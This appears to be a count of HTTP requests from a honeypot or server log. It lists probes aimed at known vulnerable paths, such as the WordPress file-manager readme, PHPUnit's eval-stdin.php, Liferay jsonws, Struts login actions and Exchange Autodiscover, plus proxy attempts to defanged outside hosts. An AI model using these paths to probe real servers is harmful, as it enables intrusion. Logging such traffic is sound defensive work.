2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD /config.asp HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
2 POST /default.jsp HTTP/1.1
1 POST /images.php HTTP/1.1
4 POST /index.action HTTP/1.1
2 POST /index.do HTTP/1.1
2 POST /index.jsp HTTP/1.1
2 POST /indexAction.action HTTP/1.1
4 POST /login.action HTTP/1.1
2 POST /login.do HTTP/1.1
2 POST /login.jsp HTTP/1.1
2 POST /login/indexAction.action HTTP/1.1
2 POST /login/login.jsp HTTP/1.1
2 POST /main.jsp HTTP/1.1
2 POST /register.jsp HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//futility[.]best/a1ca5df50f015ca07267540a4bf63da422fc1aa975fb9f3511d002faf672c182b7717b8694e965ee0d0c190ef931a2e8f41ecdc7ea0fed052a1d6386718faad9ece0adafa985f54f3175e41820fe3ae07b87db23d8128b741b727489a8743ac6 HTTP/1.1
1 POST http[:]//sherrymckinney[.]xyz/8483c5b10c5c1af426bda29a5c9e8c3b4ce23b5c38b7673403011ec62d775dae6f1a51131bd96c277ebc38d7fd4a87f25c12421d0eb5c2e09249156103353a65d9418f64048a2f55b894a9ee9e825297a9be3982a04bb0244e7f34a5426c55d7 HTTP/1.1